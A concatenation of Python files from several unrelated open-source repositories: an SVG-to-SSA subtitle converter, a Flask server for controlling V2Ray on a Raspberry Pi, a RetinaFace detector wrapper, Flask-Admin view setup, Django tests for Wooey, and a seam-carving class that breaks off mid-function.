{ "source": "8day/svg2ssa", "score": 2 }
#### File: 8day/svg2ssa/s2s_main.py
```python
import re
import tkinter

# Uncomment when cx_Freeze'ing.
# from lxml import etree
# from xml.etree import ElementTree as etree
# Uncomment when used as is.
try:
    from lxml import etree
except ImportError:
    # See: http://lxml.de/compatibility.html
    from xml.etree import ElementTree as etree

import s2s_runtime_settings
from s2s_core import *
from s2s_utilities import convert_svglength_to_pixels
from s2s_svgatts_misc import *
from s2s_svgatts_color import *
from s2s_svgatts_opacity import *
from s2s_svgatts_trafos import SVGTransform, SVGTrafoRotate, SVGTrafoScale
from s2s_svgatts_path import SVGD


class SVGElement(S2SBlockInitDataProcDtype, S2SBlockDtypeChangeable, SVGAttribute, S2SBlockContainer):
    """Converts all the attributes that other classes feed him.
    Currently works only with "path" and "g".
    """

    atts_color = {'color', 'fill', 'stroke'}
    atts_opacity = {'opacity', 'fill-opacity', 'stroke-opacity'}
    atts_rest = {'stroke-width'}
    atts_style = atts_color | atts_opacity | atts_rest
    atts_path = {'d', 'id', 'transform', 'style'} | atts_style
    atts_group = {'transform', 'style'} | atts_style
    atts_to_class_mapping = {
        'transform': SVGTransform,
        'color': SVGColor,
        'fill': SVGFill,
        'fill-opacity': SVGFillOpacity,
        'opacity': SVGOpacity,
        'stroke': SVGStroke,
        'stroke-opacity': SVGStrokeOpacity,
        'stroke-width': SVGStrokeWidth,
        'd': SVGD,
        'id': SVGId,
    }

    @staticmethod
    def process_exceptional_cases(atts):
        # Process trafos.
        if 'transform' in atts:
            trafos = atts['transform']
            # Create \org if it is absent so that each next SSA layer
            # automatically layed on top of previous w/o any shifting.
            # ATM only VSFilter behaves like this, maybe libass as well,
            # but not ffdshow subtitles filter.
            # \pos also will do the trick, but if it's not \pos(0,0).
            if 'rotate' in trafos:
                if 'translate' in trafos:
                    for i in range(len(trafos)):
                        # If there's empty \pos, then there's no need in it, so remove \pos, -- there's still \org after all.
                        if trafos.data[i].dtype == 'translate' and (trafos.data[i].data[0] == 0 and trafos.data[i].data[1] == 0):
                            del trafos.data[i]
                            break
                else:
                    # There's still \org, so everything is OK.
                    pass
            else:
                if 'translate' in trafos:
                    for i in range(len(trafos)):
                        # If there's empty \pos, then there's no need in it, so remove \pos, but add \org(0,0) to maintain collision detection override.
                        if trafos.data[i].dtype == 'translate' and (trafos.data[i].data[0] == 0 and trafos.data[i].data[1] == 0):
                            del trafos.data[i]
                            atts['transform'] = trafos + SVGTrafoRotate((0, 0, 0))
                            break
                else:
                    # There's no \org, so add it.
                    atts['transform'] = trafos + SVGTrafoRotate((0, 0, 0))
            # Create CTM for path to emulate subpixel precision.
            if 'matrix' in trafos:
                val = 2 ** (s2s_runtime_settings.magnification_level - 1)
                val = val, val
                path_ctm = SVGTrafoScale(val).matrix + trafos.data[0]
            else:
                val = 2 ** (s2s_runtime_settings.magnification_level - 1)
                val = val, val
                path_ctm = SVGTrafoScale(val).matrix
        else:
            # Create trafos with \org(0,0) and CTM for path.
            trafos = SVGTransform()
            rotate = SVGTrafoRotate((0, 0, 0))
            trafos.data = [rotate]
            atts['transform'] = trafos
            val = 2 ** (s2s_runtime_settings.magnification_level - 1)
            val = val, val
            path_ctm = SVGTrafoScale(val).matrix
        # Process path.
        atts['d'].ctm = path_ctm
        # Process color. 'Fill' attribute has higher priority over 'color'!
        if 'fill' in atts:
            if atts['fill'].data is None:
                tmp = SVGFillOpacity()
                tmp.data = 0.0
                atts['fill-opacity'] = tmp
                del atts['fill']
                if 'color' in atts:
                    del atts['color']
        if 'color' in atts:
            if atts['color'].data is None:
                tmp = SVGFillOpacity()
                tmp.data = 0.0
                atts['fill-opacity'] = tmp
            else:
                tmp = SVGFill()
                tmp.data = atts['color'].data
                # Fixme: since I stated that "'Fill' attribute has higher priority over 'color'!!!" (is that right at all?!),
                # maybe I should've checked first whether 'fill' exists so that I exidentally wouldn't override it?!
                # Todo: check in custom SVG.
                atts['fill'] = tmp
            del atts['color']
        if 'stroke' in atts:
            if atts['stroke'].data is None:
                tmp = SVGStrokeWidth()
                tmp.data = 0.0
                atts['stroke-width'] = tmp
                del atts['stroke']
        # Process opacity.
        if 'opacity' in atts:
            if 'fill-opacity' in atts and 'stroke-opacity' in atts:
                atts['fill-opacity'] += atts['opacity']
                atts['stroke-opacity'] += atts['opacity']
                del atts['opacity']
            elif 'fill-opacity' in atts:
                atts['fill-opacity'] += atts['opacity']
                del atts['opacity']
            elif 'stroke-opacity' in atts:
                atts['stroke-opacity'] += atts['opacity']
                del atts['opacity']
        # Process 'id'.
        if not 'id' in atts:
            atts['id'] = SVGId("")
        return atts

    def preprocess(self, data):
        # Select appropriate set of attributes.
        if self.dtype == 'path':
            # IT IS COMPLETELY SAFE TO USE 'SELF' TO ACCESS CLASS VARS. IT'S UNSAFE, THOUGH, WHEN I WANT TO EDIT CLASS VARS: I'LL EDIT INSTANCE VARS INSTEAD.
            supported = SVGElement.atts_path
        else:
            supported = SVGElement.atts_group
        # Filter out unsupported attributes.
        atts = {key: val for key, val in data.items() if key in supported}
        # Unpack properties from "style" to the common set of attributes.
        if 'style' in atts:
            tokens = re.sub('\s+', '', atts['style'])
            tokens = re.findall(r'(?:([^:]+?):([^;]+?)(?:;|;\Z|\Z))', tokens)
            if tokens:
                for key, val in tokens:
                    if key in SVGElement.atts_style:
                        atts.update({key: val})
            del atts['style']
        # Process attributes.
        atts = {key: SVGElement.atts_to_class_mapping[key](val) for key, val in atts.items()}
        return atts

    def update(self, other):
        # Note: beware of mutability issues.
        curr, prev = self.data, other.data
        for key in prev:
            curr[key] = curr[key] + prev[key] if key in curr else prev[key]
        return self

    def convert(self):
        atts = SVGElement.process_exceptional_cases(self.data)
        return {key: att.convert() for key, att in atts.items()}


class S2S:
    """This is 'main()', if you like. Spins all the machinery behind it.
    """

    def __init__(self, filepath):
        self.filepath = filepath
        self.element_stack = []
        self.container_stack = []
        self.ssa_meta = {}

    @staticmethod
    def make_round_and_mod(nmb, mod):
        nmb = round(nmb)
        if nmb % mod != 0:
            nmb += mod - (nmb % mod)
        return nmb

    def start_event_for_g(self, atts):
        curr = SVGElement('g', atts)
        try:
            prev = self.container_stack[-1]
            curr += prev
        except IndexError:
            pass
        self.container_stack.append(curr)

    def end_event_for_g(self):
        if self.container_stack:
            del self.container_stack[-1]

    def start_event_for_path(self, atts):
        curr = SVGElement('path', atts)
        try:
            prev = self.container_stack[-1]
            curr += prev
        except IndexError:
            pass
        self.element_stack.append(curr)

    def end_event_for_path(self):
        pass

    def start_event_for_svg(self, atts):
        width = atts.get('width')
        height = atts.get('height')
        if width is not None and height is not None:
            width = atts['width']
            height = atts['height']
            width = convert_svglength_to_pixels(width)
            height = convert_svglength_to_pixels(height)
            width = S2S.make_round_and_mod(width, 16)
            height = S2S.make_round_and_mod(height, 16)
        else:
            width = s2s_runtime_settings.ssa_default_playresx
            height = s2s_runtime_settings.ssa_default_playresx
        self.ssa_meta['playresx'] = width
        self.ssa_meta['playresy'] = height

    def end_event_for_svg(self):
        pass

    start = dict(path=start_event_for_path, g=start_event_for_g, svg=start_event_for_svg)
    end = dict(path=end_event_for_path, g=end_event_for_g, svg=end_event_for_svg)

    def convert(self):
        filepath = self.filepath
        for action, element in etree.iterparse(filepath, ('start', 'end')):
            ns_name, local_name = re.search(r'^(\{.+?\})(.+)$', element.tag).group(1, 2)
            if action == 'start':
                if local_name in S2S.start:
                    S2S.start[local_name](self, element.attrib)
            else:
                if local_name in S2S.end:
                    S2S.end[local_name](self)
        ssa_table = []
        for element in self.element_stack:
            atts = element.convert()
            ssa_table.append(s2s_runtime_settings.ssa_event.format(
                actor=atts.pop('id'),
                trans=atts.pop('transform'),
                drwng=atts.pop('d'),
                m_lev=s2s_runtime_settings.magnification_level,
                codes=''.join(obj for key, obj in atts.items())))
        ssa_table = '\n'.join(ssa_table)
        if s2s_runtime_settings.export_type == 0:
            tk = tkinter.Tk()
            tk.withdraw()
            tk.clipboard_clear()
            tk.clipboard_append(ssa_table)
            tk.destroy()
            print('Successfully converted:', filepath if len(filepath) < 52 else '...' + filepath[-52:])
        elif s2s_runtime_settings.export_type == 1:
            ssa_header = s2s_runtime_settings.ssa_header.format(
                width=self.ssa_meta['playresx'],
                height=self.ssa_meta['playresy'])
            with open(filepath + '.ass', 'w+t', buffering=65536) as fh:
                fh.write(ssa_header)
                fh.write('\n')
                fh.write(ssa_table)
                fh.write('\n')
            print('Successfully converted:', filepath if len(filepath) < 52 else '...' + filepath[-52:])
        self.element_stack = []
        self.container_stack = []
        self.ssa_meta = {}
```
{ "source": "8DE4732A/rasp_control", "score": 2 }
#### File: 8DE4732A/rasp_control/server.py
```python
import sqlite3
import subprocess
import json
import urllib
import base64
import io
import time
import random
import psutil
from threading import Lock
from flask import Flask, render_template, abort, g, request, jsonify
from jinja2 import TemplateNotFound
from flask_socketio import SocketIO, emit

app = Flask(__name__)
socketio = SocketIO(app)
thread = None
thread_lock = Lock()

DATABASE = 'rasp.db'
CONTROL_PATH = 'control.json'
CONFIG_PATH = 'config.json'
SUBSCRIPTION_URL = 'http://localhost/V2RayN_1597068639.txt'


def make_dicts(cursor, row):
    return dict((cursor.description[idx][0], value)
                for idx, value in enumerate(row))


def get_db():
    db = getattr(g, '_database', None)
    if db is None:
        db = g._database = sqlite3.connect(DATABASE)
        db.row_factory = make_dicts
    return db


def init_db():
    with app.app_context():
        db = get_db()
        with app.open_resource('schema.sql', mode='r') as f:
            db.cursor().executescript(f.read())
        db.commit()


init_db()


def query_db(query, args=(), one=False):
    cur = get_db().execute(query, args)
    rv = cur.fetchall()
    cur.close()
    return (rv[0] if rv else None) if one else rv


def delete_db():
    get_db().execute("delete from vmess where 1 = 1")
    get_db().commit()


def insert_many_db(sql, args=[]):
    get_db().executemany(sql, args)
    get_db().commit()


def update_db(sql, args=()):
    get_db().execute(sql, args)
    get_db().commit()


@app.teardown_appcontext
def close_connection(exception):
    db = getattr(g, '_database', None)
    if db is not None:
        db.close()


@app.route('/', defaults={'page': 'index'})
@app.route('/<page>')
def index(page):
    try:
        return render_template('%s.html' % page)
    except TemplateNotFound:
        abort(404)


@app.route('/v1/subscription', methods=['GET', 'POST'])
def subscription():
    if request.method == 'GET':
        results = query_db("select * from vmess where 1 = 1;")
        print(results)
        data = []
        for v in results:
            print(v)
            vmess = {"index": v["id"], "name": v["name"], "used": v["used"], "ping": 0, "bandwidth": 0}
            data.append(vmess)
        return jsonify(data)
    elif request.method == 'POST':
        print(request.form.get("action"))
        if(request.form.get("action") == "update"):
            req = urllib.request.Request(SUBSCRIPTION_URL)
            req.add_header(
                "User-Agent",
                "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36")
            with urllib.request.urlopen(req) as f:
                serverListLink = base64.b64decode(f.read()).splitlines()
            if serverListLink:
                app.logger.info(serverListLink)
                delete_db()
                data = []
                for i in range(len(serverListLink)):
                    serverNode = json.loads(base64.b64decode(
                        bytes.decode(serverListLink[i]).replace('vmess://', '')))
                    print('[' + str(i) + ']' + serverNode['ps'])
                    serverListLink[i] = serverNode
                    data.append((i, serverNode['ps'], json.dumps(serverNode)))
                app.logger.info(data)
                insert_many_db(
                    "insert into vmess(id, name, vmess) values(?,?,?)", data)
            return jsonify({"code": 0})
        elif(request.form.get("action") == "set"):
            index = request.form.get("index")
            result = query_db(
                "select vmess from vmess where id = ?", (index, ), one=True)
            print(result)
            vmess = json.loads(result["vmess"])
            export(vmess, CONFIG_PATH, 'v2config.json')
            export(vmess, '/etc/v2ray/config-ns.json', 'v2config-ns.json')
            restart()
            update_db("update vmess set used = ? where 1 = 1", (0,))
            update_db("update vmess set used = 1 where id = ?", (index,))
            return jsonify({"code": 0})


def export(vmess, path=CONFIG_PATH, template='v2config.json'):
    with open(template, 'r') as t:
        v2rayConf = t.read()
    v2rayConf = v2rayConf.replace("&address", vmess["add"])
    v2rayConf = v2rayConf.replace("&port", str(vmess["port"]))
    v2rayConf = v2rayConf.replace("&alterId", str(vmess["aid"]))
    v2rayConf = v2rayConf.replace("&uuid", vmess["id"])
    v2rayConf = v2rayConf.replace("&path", vmess["path"])
    with open(path, 'w+') as f:
        f.write(v2rayConf)


def restart():
    subprocess.call('systemctl restart v2ray-ns.service', shell=True)
    subprocess.call('systemctl restart v2ray.service', shell=True)


@app.route('/v1/control', methods=['GET', 'POST'])
def control():
    if request.method == 'GET':
        with open(CONTROL_PATH, 'r') as f:
            return f.read()
    elif request.method == 'POST':
        control = request.get_json()
        name = control["name"]
        with open(CONTROL_PATH, 'r') as f:
            control = json.loads(f.read())
        for ctrl in control:
            if ctrl["name"] == name:
                print(ctrl["script"])
                return subprocess.call(ctrl["script"], shell=True)


@app.route('/v1/config', methods=['GET', ])
def config():
    with open(CONFIG_PATH, 'r') as f:
        return f.read()


@socketio.on('disconnect', namespace='/ws/status')
def test_disconnect():
    app.logger.info('ws disconnected')


@socketio.on('connect', namespace='/ws/status')
def status_connect():
    app.logger.info("ws connect")


@socketio.on('status', namespace='/ws/status')
def status_all(status):
    app.logger.info("get all status")
    result = {"cpu": psutil.cpu_percent(interval=0.2, percpu=True),
              "cpuAve": psutil.cpu_percent(interval=0.2),
              "mem": psutil.virtual_memory()._asdict(),
              "swap": psutil.swap_memory()._asdict(),
              "temp": psutil.sensors_temperatures(),
              "uuid": status}
    app.logger.info("emit")
    emit("message", json.dumps(result), namespace="/ws/status")


if __name__ == '__main__':
    socketio.run(app=app, port=8080, debug=True)
```
{ "source": "8Dion8/retinaface", "score": 2 }
#### File: retinaface/src/retinaface.py
```python
import tensorflow as tf
import numpy as np
from utilpack.util import *
import os


class RetinaFace(object):

    def __init__(self, quality='normal'):
        """
        :param quality: one of [ 'high','normal','speed' ]
        """
        if quality == 'normal':
            self._resizeFunc = lambda v: PyImageUtil.resize_image(v[0], **{v[1]: 800})
        elif quality == 'speed':
            self._resizeFunc = lambda v: PyImageUtil.resize_image(v[0], **{v[1]: 320})
        else:
            self._resizeFunc = lambda v: v[0]
        print("model[{} quality] init ..".format(quality))
        current_dir = os.path.dirname(os.path.abspath(__file__))
        with tf.io.gfile.GFile(current_dir + '/frozen_graph.pb', "rb") as f:
            graph_def = tf.compat.v1.GraphDef()
            graph_def.ParseFromString(f.read())

        def _imports_graph_def():
            tf.compat.v1.import_graph_def(graph_def, name="")

        wrapped_import = tf.compat.v1.wrap_function(_imports_graph_def, [])
        import_graph = wrapped_import.graph
        self._model = wrapped_import.prune(
            tf.nest.map_structure(import_graph.as_graph_element, ['x:0']),
            tf.nest.map_structure(import_graph.as_graph_element, ['Identity:0'])
        )
        self.predict(np.zeros((320, 320, 3), dtype=np.float32))
        print("model success !")

    def read(self, image_path):
        """
        read image from path
        :param image_path:
        :return: rgb image, float32
        """
        img_cv = PyImageUtil.cv2.imread(image_path)
        rgb_image = PyImageUtil.cv2.cvtColor(img_cv, PyImageUtil.cv2.COLOR_BGR2RGB).astype(np.float32)
        return rgb_image

    def _predict(self, rgb_image, threshold=0.95):
        """
        detect face in rgb image
        :param rgb_image: rgb image, ! width, height have to multiplier of 32 !, float32
        :param threshold: threshold of confidence
        :return: faces(list), eache face(dict) has a key = [ x1, y1, x2, y2,left_eye,right_eye,nose,left_lip,right_lip ]
        """
        img_h, img_w = rgb_image.shape[:2]

        # preprocessing (padding)
        x = tf.cast(rgb_image, dtype=tf.float32)

        # prediction
        outputs = tf.squeeze(self._model(x[tf.newaxis, ...]), axis=0)

        # postprocessing (remove-padding, ratio to pixcel, threshold)
        outputs = tf.concat([
            tf.reshape(tf.multiply(tf.reshape(tf.slice(outputs, [0, 0], [-1, 14]), [-1, 7, 2]), [img_w, img_h]), [-1, 14]),
            tf.slice(outputs, [0, 14], [-1, 2])
        ], axis=1)
        outputs = tf.gather_nd(outputs, tf.where(tf.squeeze(tf.slice(outputs, [0, 15], [-1, 1]), axis=-1) >= threshold))
        faces = []
        for bbox in outputs:
            x1, y1, x2, y2 = list(map(int, bbox[:4]))
            left_eye, right_eye, nose, left_lip, right_lip = list(map(tuple, np.reshape(bbox, [-1, 2]).astype(np.int)[2:-1]))
            faces.append({
                'x1': x1, 'y1': y1, 'x2': x2, 'y2': y2,
                'left_eye': left_eye, 'right_eye': right_eye, 'nose': nose,
                'left_lip': left_lip, 'right_lip': right_lip
            })
        return faces

    def predict(self, rgb_image, threshold=0.95):
        """
        detect face in rgb image
        :param rgb_image: rgb image, any size, float32
        :param threshold: threshold of confidence
        :return: faces(list), eache face(dict) has a key = [ x1, y1, x2, y2,left_eye,right_eye,nose,left_lip,right_lip ]
        """
        img_h_, img_w_ = rgb_image.shape[:2]
        if img_h_ > img_w_:
            rgb_image = self._resizeFunc([rgb_image, 'height'])
        else:
            rgb_image = self._resizeFunc([rgb_image, 'width'])
        img_h, img_w = rgb_image.shape[:2]

        # preprocessing (padding)
        max_steps = 32
        img_h_pad = max_steps - img_h % max_steps if img_h and img_h % max_steps != 0 else 0
        img_w_pad = max_steps - img_w % max_steps if img_w and img_w % max_steps != 0 else 0
        padded_img = tf.pad(rgb_image, [[0, img_h_pad], [0, img_w_pad], [0, 0]])
        x = tf.cast(padded_img, dtype=tf.float32)

        # prediction
        outputs = tf.squeeze(self._model(x[tf.newaxis, ...]), axis=0)

        # postprocessing (remove-padding, ratio to pixcel, threshold)
        outputs = tf.concat([
            tf.reshape(tf.multiply(tf.reshape(tf.slice(outputs, [0, 0], [-1, 14]), [-1, 7, 2]),
                                   [tf.add(img_w_pad, img_w if img_w else 0), tf.add(img_h_pad, img_h if img_h else 0)]),
                       [-1, 14]),
            tf.slice(outputs, [0, 14], [-1, 2])
        ], axis=1)
        outputs = tf.gather_nd(outputs, tf.where(tf.squeeze(tf.slice(outputs, [0, 15], [-1, 1]), axis=-1) >= threshold))
        faces = []
        for bbox in outputs:
            w_ex = img_w_ / img_w
            h_ex = img_h_ / img_h
            x1, y1, x2, y2 = list(map(int, np.multiply(bbox[:4], [w_ex, h_ex, w_ex, h_ex])))
            left_eye, right_eye, nose, left_lip, right_lip = list(map(tuple, np.multiply(np.reshape(bbox, [-1, 2]), [w_ex, h_ex]).astype(np.int)[2:-1]))
            faces.append({
                'x1': x1, 'y1': y1, 'x2': x2, 'y2': y2,
                'left_eye': left_eye, 'right_eye': right_eye, 'nose': nose,
                'left_lip': left_lip, 'right_lip': right_lip
            })
        return faces

    def draw(self, rgb_image, faces, thickness=3, **kwargs):
        """
        :param rgb_image: rgb_image , same size of predict's input
        :param faces: result of predict method
        :param thickness: thickness of line's
        :keyword colors: list of color, each color element mean [ faceRect, left_eye, right_eye, nose, left_lip, right_lip ]
        :return: result image
        """
        darwing_img = rgb_image.copy()
        if 'colors' in kwargs:
            colors = kwargs['colors']
        else:
            colors = [(255, 0, 255), (255, 0, 0), (0, 255, 0), (0, 0, 255), (0, 0, 0), (255, 0, 255)]
        for face in faces:
            PyImageUtil.cv2.rectangle(darwing_img, (face['x1'], face['y1']), (face['x2'], face['y2']), colors[0], thickness)
            PyImageUtil.cv2.circle(darwing_img, face['left_eye'], 1, colors[1], thickness)
            PyImageUtil.cv2.circle(darwing_img, face['right_eye'], 1, colors[2], thickness)
            PyImageUtil.cv2.circle(darwing_img, face['nose'], 1, colors[3], thickness)
            PyImageUtil.cv2.circle(darwing_img, face['left_lip'], 1, colors[4], thickness)
            PyImageUtil.cv2.circle(darwing_img, face['right_lip'], 1, colors[5], thickness)
        return darwing_img


if __name__ == '__main__':
    import cv2
    detector = RetinaFace('normal')
    for path in PyDataUtil.get_pathlist('/Users/hian/Desktop/Data/image_data/snaps_image/thum'):
        rgb_image = detector.read(path)
        rgb_image = cv2.resize(rgb_image, (640, 640))
        PyDebugUtil.tic()
        faces = detector._predict(rgb_image)
        time = PyDebugUtil.toc()
```
{ "source": "8dspaces/orderlc", "score": 2 }
#### File: orderlc/admin/views.py
```python
from flask import Blueprint, render_template
from flask_login import login_required, current_user
from flask_admin import Admin, BaseView, expose
from flask_admin.contrib.sqla import ModelView


class AdminView(BaseView):
    def is_accessible(self):
        return current_user.is_authenticated() and current_user.is_admin


# class ModelView(ModelView, AdminView):
#     pass

from ..extensions import flask_admin, db
from ..user.models import User
from ..public.models import Customer, Good, Container

flask_admin.add_view(ModelView(User, db.session, endpoint='user-admin'))
flask_admin.add_view(ModelView(Container, db.session, endpoint='container-admin'))
flask_admin.add_view(ModelView(Good, db.session, endpoint='good-admin'))
flask_admin.add_view(ModelView(Customer, db.session, endpoint='customer-admin'))
```
{ "source": "8dspaces/Wooey-Flask", "score": 2 }
#### File: wooey/tests/test_commands.py
```python
import os

from django.test import TestCase

from . import config
from ..backend import utils
from . import mixins


class FormTestCase(mixins.ScriptFactoryMixin, TestCase):

    def test_addscript(self):
        from django.core.management import call_command
        call_command('addscript', os.path.join(config.WOOEY_TEST_SCRIPTS, 'command_order.py'))
```

#### File: wooey/tests/test_utils.py
```python
import os

from django.test import TestCase

from ..backend import utils
from . import factories
from . import config
from . import mixins


class TestUtils(mixins.ScriptFactoryMixin, TestCase):

    def test_sanitize_name(self):
        assert(utils.sanitize_name('abc')) == 'abc'
        assert(utils.sanitize_name('ab c')) == 'ab_c'
        assert(utils.sanitize_name('ab-c')) == 'ab_c'

    def test_sanitize_string(self):
        assert(utils.sanitize_string('ab"c')) == 'ab\\"c'

    def test_add_script(self):
        pass
        # TODO: fix me
        # utils.add_wooey_script(script=os.path.join(config.WOOEY_TEST_SCRIPTS, 'translate.py'))

    def test_anonymous_users(self):
        from .. import settings as wooey_settings
        from django.contrib.auth.models import AnonymousUser
        user = AnonymousUser()
        script_version = self.translate_script
        script = script_version.script
        d = utils.valid_user(script, user)
        self.assertTrue(d['valid'])
        wooey_settings.WOOEY_ALLOW_ANONYMOUS = False
        d = utils.valid_user(script, user)
        self.assertFalse(d['valid'])

    def test_valid_user(self):
        user = factories.UserFactory()
        script_version = self.translate_script
        script = script_version.script
        d = utils.valid_user(script, user)
        self.assertTrue(d['valid'])
        from .. import settings as wooey_settings
        self.assertEqual('disabled', d['display'])
        wooey_settings.WOOEY_SHOW_LOCKED_SCRIPTS = False
        d = utils.valid_user(script, user)
        self.assertEqual('hide', d['display'])
        from django.contrib.auth.models import Group
        test_group = Group(name='test')
        test_group.save()
        script.user_groups.add(test_group)
        d = utils.valid_user(script, user)
        self.assertFalse(d['valid'])
        user.groups.add(test_group)
        d = utils.valid_user(script, user)
        self.assertTrue(d['valid'])


class TestFileDetectors(TestCase):

    def test_detector(self):
        self.file = os.path.join(config.WOOEY_TEST_DATA, 'fasta.fasta')
        res, preview = utils.test_fastx(self.file)
        self.assertEqual(res, True, 'Fastx parser fail')
        self.assertEqual(preview, open(self.file).readlines(), 'Fastx Preview Fail')

    def test_delimited(self):
        self.file = os.path.join(config.WOOEY_TEST_DATA, 'delimited.tsv')
        res, preview = utils.test_delimited(self.file)
        self.assertEqual(res, True, 'Delimited parser fail')
        self.assertEqual(preview, [i.strip().split('\t') for i in open(self.file).readlines()], 'Delimited Preview Fail')
```

#### File: wooey/tests/test_views.py
```python
import json

from django.test import TestCase, RequestFactory, Client
from django.core.urlresolvers import reverse
from django.contrib.auth.models import AnonymousUser
from django.http import Http404

from nose.tools import raises

from . import factories, mixins, config
from ..views import wooey_celery
from .. import views as wooey_views
from .. import settings


def load_JSON_dict(d):
    return json.loads(d.decode('utf-8'))


class CeleryViews(mixins.ScriptFactoryMixin, mixins.FileCleanupMixin, TestCase):

    def setUp(self):
        super(CeleryViews, self).setUp()
        self.factory = RequestFactory()
        # the test server doesn't have celery running
        settings.WOOEY_CELERY = False

    def test_celery_results(self):
        request = self.factory.get(reverse('wooey:all_queues_json'))
        user = factories.UserFactory()
        request.user = user
        response = wooey_celery.all_queues_json(request)
        d = response.content.decode("utf-8")
        self.assertEqual(
            {u'items': {u'global': [], u'results': [], u'user': []},
             u'totals': {u'global': 0, u'results': 0, u'user': 0}},
            json.loads(d))
        job = factories.generate_job(self.translate_script)
        job.save()
        response = wooey_celery.all_queues_json(request)
        d = json.loads(response.content.decode("utf-8"))
        self.assertEqual(1, d['totals']['global'])
        job.user = user
        job.save()
        response = wooey_celery.all_queues_json(request)
        d = json.loads(response.content.decode("utf-8"))
        # we now are logged in, make sure the job appears under the user jobs
        self.assertEqual(1, d['totals']['user'])
        user = AnonymousUser()
        request.user = user
        response = wooey_celery.all_queues_json(request)
        d = json.loads(response.content.decode("utf-8"))
        # test empty response since anonymous users should not see users jobs
        self.assertEqual(d['items']['results'], [])
        self.assertEqual(d['items']['user'], [])

    def test_celery_commands(self):
        user = factories.UserFactory()
        job = factories.generate_job(self.translate_script)
        job.user = user
        job.save()
        celery_command = {'celery-command': ['delete'], 'job-id': [job.pk]}
        # test that we cannot modify a users script
        request = self.factory.post(reverse('wooey:celery_task_command'), celery_command)
        anon = AnonymousUser()
        request.user = anon
        response = wooey_celery.celery_task_command(request)
        d = response.content.decode("utf-8")
        self.assertFalse(json.loads(d).get('valid'))
        # test a nonsense command
        celery_command.update({'celery-command': ['thisshouldfail']})
        response = wooey_celery.celery_task_command(request)
        d = response.content.decode("utf-8")
        self.assertFalse(json.loads(d).get('valid'))
        # test that the user can interact with it
        # the stop command will break, so currently untested here until I figure it out
        for i in ['resubmit', 'rerun', 'clone', 'delete']:
            celery_command.update({'celery-command': [i]})
            request = self.factory.post(reverse('wooey:celery_task_command'), celery_command)
            request.user = user
            response = wooey_celery.celery_task_command(request)
            d = response.content.decode("utf-8")
            self.assertTrue(json.loads(d).get('valid'))

    def test_celery_task_view(self):
        user = factories.UserFactory()
        job = factories.generate_job(self.translate_script)
        job.user = user
        job.save()
        # test that an anonymous user cannot view a user's job
        view = wooey_celery.JobView.as_view()
        request = self.factory.get(reverse('wooey:celery_results', kwargs={'job_id': job.pk}))
        request.user = AnonymousUser()
        response = view(request, job_id=job.pk)
        self.assertIn('job_error', response.context_data)
        self.assertNotIn('job_info', response.context_data)
        # test the user can view the job
        request.user = user
        response = view(request, job_id=job.pk)
        self.assertNotIn('job_error', response.context_data)
        self.assertIn('job_info', response.context_data)

    @raises(Http404)
    def test_celery_nonexistent_task(self):
        # test request for non-existent job, should raise 404
        view = wooey_celery.JobView.as_view()
        request = self.factory.get(reverse('wooey:celery_results', kwargs={'job_id': '-1'}))
        response = view(request, job_id=-1)


class WooeyViews(mixins.ScriptFactoryMixin, mixins.FileCleanupMixin, TestCase):

    def setUp(self):
        super(WooeyViews, self).setUp()
        self.factory = RequestFactory()
        self.script_view_func = wooey_views.WooeyScriptJSON.as_view()
        # the test server doesn't have celery running
        settings.WOOEY_CELERY = False

    def test_multiple_choice_clone(self):
        from ..backend import utils
        script_version = self.choice_script
        script = script_version.script
        choices = ['2', '1', '3']
        choice_param = 'two_choices'
        job = utils.create_wooey_job(
            script_version_pk=script_version.pk,
            data={'job_name': 'abc', choice_param: choices, 'wooey_type': script_version.pk})
        request = self.factory.post(
            reverse('wooey:wooey_script_clone',
                    kwargs={'slug': job.script_version.script.slug, 'job_id': job.pk}),
            data={'wooey_type': script_version.pk})
        request.user = AnonymousUser()
        response = self.script_view_func(request, pk=job.pk, job_id=job.pk)
        self.assertEqual(response.status_code, 200)

    def test_multiple_choice(self):
        user = factories.UserFactory()
        script_version = self.choice_script
        script = script_version.script
        url = reverse('wooey:wooey_script', kwargs={'slug': script.slug})
        data = {'job_name': 'abc', 'wooey_type': script_version.pk, 'two_choices': ['2', '1', '3']}
        filecount = 0
        for i, v in config.SCRIPT_DATA['choices']['files'].items():
            data[i] = v
            filecount += len(v)
        request = self.factory.post(url, data=data)
        request.user = user
        response = self.script_view_func(request)
        d = load_JSON_dict(response.content)
        self.assertTrue(d['valid'], d)
        self.assertEqual(sum([len(request.FILES.getlist(i)) for i in request.FILES.keys()]), filecount)
        # test submitting this in the 'currently' field
        from ..models import WooeyJob
        job = WooeyJob.objects.latest('created_date')
        files = [i.value.name for i in job.get_parameters() if i.parameter.slug == 'multiple_file_choices']
        data['multiple_file_choices'] = files
        request = self.factory.post(url, data=data)
        request.user = user
        response = self.script_view_func(request)
        self.assertEqual(response.status_code, 200)
        d = load_JSON_dict(response.content)
        self.assertTrue(d['valid'], d)
        # check the files are actually with the new model
        job = WooeyJob.objects.latest('created_date')
        new_files = [i.value.url for i in job.get_parameters() if i.parameter.slug == 'multiple_file_choices']
        self.assertEqual(len(new_files), len(files))
```
{ "source": "8eodorosk/seam_carving", "score": 2 }
#### File: 8eodorosk/seam_carving/Seam.py
```python
import numpy as np
from imageio import imread, imwrite
from scipy.ndimage.filters import convolve
from tqdm import trange
from matplotlib import pyplot as plt
import numba


class Seam:

    def __init__(self, filter_du, filter_dv, img):
        self.filter_du = filter_du
        self.filter_dv = filter_dv
        self.img = img

    def calc_energy(self):
        # print(self.img.shape)
        filter_du_3d = np.stack([self.filter_du] * 3, axis=2)
        filter_dv_3d = np.stack([self.filter_dv] * 3, axis=2)
        # print(filter_du_3d)
        # print(filter_dv_3d)
        self.img = self.img.astype('float32')
        convolved_x = np.absolute(convolve(self.img, filter_du_3d))
        convolved_y = np.absolute(convolve(self.img, filter_dv_3d))
        convolved = convolved_x + convolved_y
        # We sum the energies in the red, green, and blue channels
        energy_map = convolved.sum(axis=2)
        # energy_map_x = convolved_x.sum(axis=2)
        # energy_map_y = convolved_y.sum(axis=2)
        return energy_map

    @numba.jit
    def minimum_seam(self):
        r, c, _ = self.img.shape
        energy_map = self.calc_energy()
        M = energy_map.copy()
        backtrack = np.zeros_like(M, dtype=np.int)
        for i in range(1, r):
            for j in range(0, c):
                # Handle the left edge of the image, to ensure we don't index -1
                if j == 0:
                    idx = np.argmin(M[i - 1, j:j + 2])
                    backtrack[i, j] = idx + j
